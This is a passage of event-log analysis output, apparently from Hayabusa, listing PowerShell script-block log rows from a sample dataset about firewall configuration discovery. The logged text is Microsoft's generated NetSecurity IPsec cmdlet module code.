[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' 
$script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', 